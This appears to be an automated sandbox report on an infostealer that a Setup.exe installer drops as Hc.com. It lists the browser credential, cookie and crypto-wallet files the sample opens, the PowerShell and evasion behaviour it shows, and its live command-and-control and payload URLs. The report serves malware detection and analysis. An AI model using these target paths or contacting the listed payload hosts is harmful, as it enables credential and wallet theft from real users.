            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
            Source: Hc.comBinary or memory string: WIN_81
            Source: Hc.comBinary or memory string: WIN_XP
            Source: Developers.8.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
            Source: Hc.com Binary or memory string: WIN_XPe
            Source: Hc.com Binary or memory string: WIN_VISTA
            Source: Hc.com Binary or memory string: WIN_7
            Source: Hc.com Binary or memory string: WIN_8
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Directory queried: C:\Users\user\Documents\NWTVCDUMOB
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Directory queried: C:\Users\user\Documents\NWTVCDUMOB
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Directory queried: C:\Users\user\Documents\BPMLNOBVSB
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Directory queried: C:\Users\user\Documents\BPMLNOBVSB
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Directory queried: C:\Users\user\Documents\FENIVHOIKN
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Directory queried: C:\Users\user\Documents\FENIVHOIKN
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Directory queried: C:\Users\user\Documents\KATAXZVCPS
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Directory queried: C:\Users\user\Documents\KATAXZVCPS
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Directory queried: C:\Users\user\Documents\NWTVCDUMOB
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Directory queried: C:\Users\user\Documents\NWTVCDUMOB
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Directory queried: C:\Users\user\Documents\SFPUSAFIOL
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Directory queried: C:\Users\user\Documents\SFPUSAFIOL
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Directory queried: C:\Users\user\Documents\BPMLNOBVSB
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Directory queried: C:\Users\user\Documents\BPMLNOBVSB

            Remote Access Functionality

            Source: Yara match File source: Process Memory Space: Hc.com PID: 7836, type: MEMORYSTR
            Source: Yara match File source: sslproxydump.pcap, type: PCAP
            Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Code function: 11_2_002E2263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 11_2_002E2263
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Code function: 11_2_002E1C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 11_2_002E1C61
            MITRE ATT&CK Matrix (one line per tactic; a number before a technique is the count shown in that matrix cell, techniques without a number have no entry for this sample)

            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
            Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
            Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
            Execution: 21 Windows Management Instrumentation; 1 Native API; 2 Command and Scripting Interpreter; 2 PowerShell; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
            Persistence: 1 DLL Side-Loading; 2 Valid Accounts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
            Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation; 12 Process Injection; RC Scripts; Startup Items; Scheduled Task/Job; At
            Defense Evasion: 1 Disable or Modify Tools; 11 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 DLL Side-Loading; 11 Masquerading; 2 Valid Accounts; 121 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 12 Process Injection
            Credential Access: 2 OS Credential Dumping; 21 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
            Discovery: 2 System Time Discovery; 1 Account Discovery; 13 File and Directory Discovery; 37 System Information Discovery; 131 Security Software Discovery; 121 Virtualization/Sandbox Evasion; 4 Process Discovery; 11 Application Window Discovery; 1 System Owner/User Discovery
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
            Collection: 1 Archive Collected Data; 41 Data from Local System; 21 Input Capture; 3 Clipboard Data; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
            Command and Control: 4 Ingress Tool Transfer; 11 Encrypted Channel; 4 Non-Application Layer Protocol; 115 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
            Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
            Behavior Graph ID: 1580131, Sample: Setup.exe, Start date: 24/12/2024, Architecture: WINDOWS, Score: 100

            Legend (node types of the graph image; the number after a process name is the count badge the graph attaches to it):

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Nodes and edges recovered from the graph text:

            Start -> Setup.exe 21 (started). Domains/IPs at start: hungrypaster.click; neqi.shop; 2 other IPs or domains. Signatures at start: Suricata IDS alerts for network traffic; Found malware configuration; Antivirus detection for URL or domain; 6 other signatures
            Setup.exe -> cmd.exe 2 (started)
            cmd.exe -> C:\Users\user\AppData\Local\Temp\...\Hc.com, PE32 (dropped). Signature: Drops PE files with a suspicious file extension
            cmd.exe -> Hc.com (started); extrac32.exe 22 (started); cmd.exe 2 (started); 8 other processes
            Hc.com -> hungrypaster.click 188.114.97.6, 443, 49742, 49743 CLOUDFLARENETUS European Union; kliptizq.shop 104.21.84.113, 443, 49751 CLOUDFLARENETUS United States; neqi.shop 172.67.169.205, 443, 49750 CLOUDFLARENETUS United States
            Hc.com signatures: Suspicious powershell command line found; Query firmware table information (likely to detect VMs); Found many strings related to Crypto-Wallets (likely being stolen); 4 other signatures
            Hc.com -> powershell.exe 21 (started); powershell.exe (started)
            extrac32.exe -> C:\Users\user\AppData\Local\Temp\Adaptor, DOS (dropped)
            powershell.exe 21 -> conhost.exe (started). Signature: Loading BitLocker PowerShell Module
            powershell.exe -> conhost.exe (started)

            Source | Detection | Scanner | Label
            Setup.exe | 6% | Virustotal |
            Setup.exe | 0% | ReversingLabs |
            Source | Detection | Scanner | Label
            C:\Users\user\AppData\Local\Temp\280366\Hc.com | 0% | ReversingLabs |
            C:\Users\user\AppData\Local\Temp\Adaptor | 0% | ReversingLabs |
            No Antivirus matches
            No Antivirus matches
            Source | Detection | Scanner | Label
            https://kliptizq.shop:443/int_clp_ldr_sha.txt | 100% | Avira URL Cloud | malware
            https://hungrypaster.click:443/api.default-release/key4.dbPK | 0% | Avira URL Cloud | safe
            https://kliptizq.shop/(W# | 100% | Avira URL Cloud | malware
            https://hungrypaster.click:443/apitPK | 0% | Avira URL Cloud | safe
            https://kliptizq.shop/ | 100% | Avira URL Cloud | malware
            https://neqi.shop/sdgjyut/psh.txt | 100% | Avira URL Cloud | malware
            https://neqi.shop/ | 100% | Avira URL Cloud | malware
            https://hungrypaster.click:443/api | 0% | Avira URL Cloud | safe
            https://hungrypaster.click/ | 0% | Avira URL Cloud | safe
            hungrypaster.click | 0% | Avira URL Cloud | safe
            https://neqi.shop:443/sdgjyut/psh.txt | 100% | Avira URL Cloud | malware
            https://neqi.shop/sdgjyut/psh.txto | 100% | Avira URL Cloud | malware
            https://neqi.shop/BJ | 100% | Avira URL Cloud | malware
            http://crl.microb | 0% | Avira URL Cloud | safe
            https://hungrypaster.click/api | 0% | Avira URL Cloud | safe
            https://hungrypaster.click:443/api3r78r106r115r115r112r115r43r69r106r103r103r102r115r102r111r100r102 | 0% | Avira URL Cloud | safe
            https://neqi.shop/sdgjyut/psh.txtk | 100% | Avira URL Cloud | malware
            NameIPActiveMaliciousAntivirus DetectionReputation
            hungrypaster.click
            188.114.97.6
            truetrue
              unknown
              kliptizq.shop
              104.21.84.113
              truefalse
                high
                neqi.shop
                172.67.169.205
                truefalse
                  high
                  PvXlInYKrSNwyXWSA.PvXlInYKrSNwyXWSA
                  unknown
                  unknownfalse
                    unknown
                    NameMaliciousAntivirus DetectionReputation
                    curverpluch.latfalse
                      high
                      slipperyloo.latfalse
                        high
                        tentabatte.latfalse
                          high
                          hungrypaster.clicktrue
                          • Avira URL Cloud: safe
                          unknown
                          manyrestro.latfalse
                            high
                            https://neqi.shop/sdgjyut/psh.txtfalse
                            • Avira URL Cloud: malware
                            unknown
                            bashfulacid.latfalse
                              high
                              wordyfindy.latfalse
                                high
                                shapestickyr.latfalse
                                  high
                                  talkynicer.latfalse
                                    high
                                    https://kliptizq.shop/int_clp_ldr_sha.txtfalse
                                      high
                                      https://hungrypaster.click/apitrue
                                      • Avira URL Cloud: safe
                                      unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://www.cloudflare.com/learning/access-management/phishing-attack/ | powershell.exe, 00000012.00000002.2254156807.00000000053F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2253287573.000000000324C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2253165533.00000000030A0000.00000004.00000020.00020000.00000000.sdmp | false |  | high
https://duckduckgo.com/chrome_newtab | Hc.com, 0000000B.00000003.2044585816.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043897088.000000000447A000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044209015.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043959982.0000000004463000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044421982.0000000004464000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://duckduckgo.com/ac/?q= | Hc.com, 0000000B.00000003.2044585816.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043897088.000000000447A000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044209015.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043959982.0000000004463000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044421982.0000000004464000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://hungrypaster.click:443/api.default-release/key4.dbPK | Hc.com, 0000000B.00000002.2324057509.0000000001873000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://kliptizq.shop/ | Hc.com, 0000000B.00000002.2324659198.0000000004363000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://hungrypaster.click/ | Hc.com, 0000000B.00000003.2067214936.00000000043A4000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/License | powershell.exe, 00000010.00000002.2338815956.0000000006038000.00000004.00000800.00020000.00000000.sdmp | false |  | high
http://ocsps.ssl.com0 | Setup.exe | false |  | high
https://www.cloudflare.com/learning/access-management/phishhZ | powershell.exe, 00000012.00000002.2254156807.00000000054F3000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | Hc.com, 0000000B.00000003.2044585816.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043897088.000000000447A000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044209015.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043959982.0000000004463000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044421982.0000000004464000.00000004.00000800.00020000.00000000.sdmp | false |  | high
